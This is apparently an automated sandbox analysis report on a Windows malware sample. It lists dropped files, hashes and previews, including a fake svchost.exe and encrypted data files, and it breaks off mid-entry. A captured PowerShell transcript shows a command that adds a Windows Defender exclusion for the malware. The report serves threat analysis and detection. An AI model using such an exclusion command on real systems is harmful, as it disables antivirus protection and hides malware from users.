                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ALa.........."...P..n..........^.... ........@.. ...................................`.....................................K....................z............................................................... ............... ..H............text...dl... ...n.................. ..`.rsrc................p..............@..@.reloc...............x..............@..B................@.......H........;...P......,....:..p............................................*. ....*.....90...(....9........r...p....(....(....*........(....*....*R(........(....o....*.....90...(....9........r...p....(....(....*........(....*....*..(6...*..(7...*.s8........s9........s:........s;........*.~....o<...*.~....o=...*.~....o>...*.~....o?...*6..(@...(A...*..(B...*......(C...*..(0...*".......*..(E...*r~F........-.(...+.F...~F...*.~.....(G...,.r...p.....(C...oH...sI........~....*.~....*.
                                                                                          C:\Users\Public\Documents\???????????????\svchost.exe:Zone.Identifier
                                                                                          Process:C:\Users\user\Desktop\s9SWgUgyO5.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:true
                                                                                          Reputation:unknown
                                                                                          Preview: [ZoneTransfer]....ZoneId=0
                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):22204
                                                                                          Entropy (8bit):5.604931016283915
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:PtCD3quw+SZPme8biRISBKnMjul3PpaeQ99gRSJxmT1MaLZlgRV7QJ3D+ZBDI+iL:4S5m7/4KMCl3Bat8RdCqfY8sVK
                                                                                          MD5:4B93FB7D4BBA6A90C7B60F808253C182
                                                                                          SHA1:014DDCAF8FE035ACE2687DE48AA3B6B4579A49FB
                                                                                          SHA-256:2EAAECE83684170AC401DD0430DD048C5E995C561F45584FF58C565F5EAA1ADC
                                                                                          SHA-512:A43B82C57B05CD69CFDFC89115B485FED0C2C3D80B0AD30EBD79987FAED4C2634F015B9A5498E668141AF97836B5BA0C9E90C080D08D9FEFC08B55BA1F00C913
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: @...e...........g.........>.b.Q.Q...G.....~..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vptdszn.afy.ps1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21by5mbg.ozg.ps1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3la1bnrc.tow.psm1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zzq33dl.zko.ps1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xsvq2co.5px.ps1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxgvoyop.yop.ps1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hrkzr5yy.54x.psm1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzm0yq0h.1yh.psm1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kyz0njed.lca.psm1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lq2mhz2z.irn.ps1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmzxtpal.wlv.ps1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbngdk45.hvk.ps1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qx5b0ha2.mrm.psm1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rslbwbev.gpk.ps1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2q3ne0h.er5.psm1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvx0vfuv.bx0.psm1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1nf1r4w.p5l.psm1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvraegol.fzc.psm1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                                                                                          Process:C:\Users\user\Desktop\s9SWgUgyO5.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):2088
                                                                                          Entropy (8bit):7.089541637477408
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhDjhDjhL
                                                                                          MD5:84864902DEC5038CEF326FF21E8D5F98
                                                                                          SHA1:2F10FEC81D95813C3B2530EC4CECED70164A08C5
                                                                                          SHA-256:5B4853A46F99AC6445B68DC1A841D511D0E86C6EDEC2A0A84F3778039A578B6B
                                                                                          SHA-512:A77BCDB522CE208C8D785F44D9FE90C6D1314CB199A4BE72E220F4B8C5446265EEEF1C51EFFD2D7BDCCDC8F4A76F803A41A4973364757950D0777E8BAEF0B14C
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                          Process:C:\Users\user\Desktop\s9SWgUgyO5.exe
                                                                                          File Type:Non-ISO extended-ASCII text, with no line terminators, with overstriking
                                                                                          Category:dropped
                                                                                          Size (bytes):8
                                                                                          Entropy (8bit):3.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:D8t:g
                                                                                          MD5:55F6F1959EBADA17984856874E790F5E
                                                                                          SHA1:88D220D3E2D7561810EC950BBA5FDACC27DDB7ED
                                                                                          SHA-256:32E03F7509EA93E49C11CD08382D03124001F3C0728FD1814C606E1CE81010C7
                                                                                          SHA-512:676E513CD1CC4350ED1F7F5387C7105E351FA80AFC7EAA440F3261DD9600DD5B5271A020FB709F03C703FB3CEE322E6DF145752DEBDC98981EF3BF8DD8D91465
                                                                                          Malicious:true
                                                                                          Reputation:unknown
                                                                                          Preview: ?.../..H
                                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                                                                                          Process:C:\Users\user\Desktop\s9SWgUgyO5.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):40
                                                                                          Entropy (8bit):5.153055907333276
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                                                                                          MD5:4E5E92E2369688041CC82EF9650EDED2
                                                                                          SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                                                                                          SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                                                                                          SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: 9iH...}Z.4..f.~a........~.~.......3.U.
                                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                                                                                          Process:C:\Users\user\Desktop\s9SWgUgyO5.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):327768
                                                                                          Entropy (8bit):7.999367066417797
                                                                                          Encrypted:true
                                                                                          SSDEEP:6144:oX44S90aTiB66x3PlZmqze1d1wI8lkWmtjJ/3Exi:LkjbU7LjGxi
                                                                                          MD5:2E52F446105FBF828E63CF808B721F9C
                                                                                          SHA1:5330E54F238F46DC04C1AC62B051DB4FCD7416FB
                                                                                          SHA-256:2F7479AA2661BD259747BC89106031C11B3A3F79F12190E7F19F5DF65B7C15C8
                                                                                          SHA-512:C08BA0E3315E2314ECBEF38722DF834C2CB8412446A9A310F41A8F83B4AC5984FCC1B26A1D8B0D58A730FDBDD885714854BDFD04DCDF7F582FC125F552D5C3CA
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                                                                          C:\Users\user\Documents\20210927\PowerShell_transcript.910646.9xOhnXgG.20210927202809.txt
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6107
                                                                                          Entropy (8bit):5.556058998332182
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:BZj/QNfqqDo1ZDSZA/QNfqqDo1ZGbFdFTFjZy/QNfqqDo1ZswFDFDFOZ5:kAeTfJXehhY
                                                                                          MD5:18CDD9EA62447E4A2999BF7A9C164630
                                                                                          SHA1:1ED8E125D2500384B18E6C2B684403A9C4E4FABD
                                                                                          SHA-256:EF61BF6DD371E21F947373836CC83CA7084A3F2DFE00AC90CAF27843E9D0A9D7
                                                                                          SHA-512:C2C98836849177A9BA53D5B267E9EFB987BE8519B68161923B2A4FFA289B4DE3A2B69FA05555269261312245D9936ABA88117BD0651DCB83A03EBC12FF725BB6
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210927202811..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..Process ID: 1848..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210927202811..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..**********************..Windows PowerShell transcript start..S
                                                                                          C:\Users\user\Documents\20210927\PowerShell_transcript.910646.Axn3CWdN.20210927202806.txt
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6104
                                                                                          Entropy (8bit):5.555508386056664
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:BZR/QNfkqDo1ZBSZy/QNfkqDo1ZsbFdFTFjZV/QNfkqDo1ZgwFDFDFSZN:CEczfJWEhhQ
                                                                                          MD5:6A5343E763EB4E100A426048F715143B
                                                                                          SHA1:1C13465116174132910ACBAA4DEB6CA621DA5DAE
                                                                                          SHA-256:04755AA24B89085564414DC6AF497069A736FF3DFD9E00A62BF0D32AC9951A44
                                                                                          SHA-512:9088DF47FADE14E25FE99F63D742E057158F887A6CCBF14922D7CBB444098C2FE519C616DFC591F4BF8AA8B3C97ACBA9A0C770E890E06058FE79463E3DD8DDFB
                                                                                          Malicious:false
